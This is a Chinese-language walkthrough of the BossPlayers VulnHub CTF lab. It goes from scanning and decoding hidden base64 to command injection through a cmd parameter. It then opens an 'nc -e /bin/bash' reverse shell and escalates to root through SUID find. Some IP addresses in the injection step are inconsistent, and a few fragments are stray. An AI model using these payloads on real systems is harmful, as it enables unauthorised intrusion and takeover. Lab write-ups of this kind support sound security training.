先下载靶机
靶机下载链接:
https://download.vulnhub.com/bossplayers/bossplayersCTF.ova
收集信息
1.发现靶机ip
查看kali的ip
靶机要和kali在同一模式下(NAT)
靶机ip
arp-scan --interface=eth0 --localnet
2. 扫描端口
nmap -sS -sV -T4 -A -p- 192.168.239.17
发现一个80端口(网页打不开)还有一个22端口
3.对网站进行爆破
dirb http://192.168.239.17
发现三个目录
这个应该是一个加密的
难度级别:[*][][][][]
描述:您好!我为那些想要上手的人创建了极其简单的 CTF。掌握方法论,避免误入歧途!我希望你喜欢这个,最重要的是,请玩得开心!
您无权访问此服务器上的/server-status。
Apache/2.4.38 (Debian) 服务器位于 192.168.239.17 端口 80
发现三个目录好像都没有什么用
先把一个密钥解密一下
意思:在努力点,兄弟(也是没用的信息)
4.利用源代码查找有用信息
view-source:http://192.168.239.17/index.html 网页下发现密文
进行破解
解密出来还是密文 嵌套
经过两次出现了想要的东西
得出的应该可以进行访问的URL路径:
http://192.168.239.17/workinginprogress.php
利用漏洞-命令注入
修复访问的URL :
进行id命令
进行pwd命令
uname- -a 查看内核版本
需要的信息的大部分都已经掌握
接下我们进行反弹shell
反弹shell
在kali机上监听
nc -lvp 4567
fne
URL改为http://192.168.200.132/workinginprogress.php?cmd=nc -e /bin/bash 192.168.239.17 4567
得到shell后执行操作,发现和我们在浏览器修改传递参数得到的内容一致
┌──(root㉿kali)-[~]
└─# nc -lvvp 4567
listening on [any] 4567 ...
192.168.239.17: inverse host lookup failed: Unknown host
connect to [192.168.239.13] from (UNKNOWN) [192.168.239.17] 37288
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
whoami
www-data
pwd
/var/www/html
uname -a
Linux bossplayers 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u1 (2019-09-20) x86_64 GNU/Linux
1.使用python命令转换成交互式shell
python -c 'import pty;pty.spawn("/bin/bash")'
2.提权
find / -perm -u=s -type f 2>/dev/null
find . -exec /bin/bash -p \;
flat
破解密文 Y29uZ3JhdHVsYXRpb25zCg==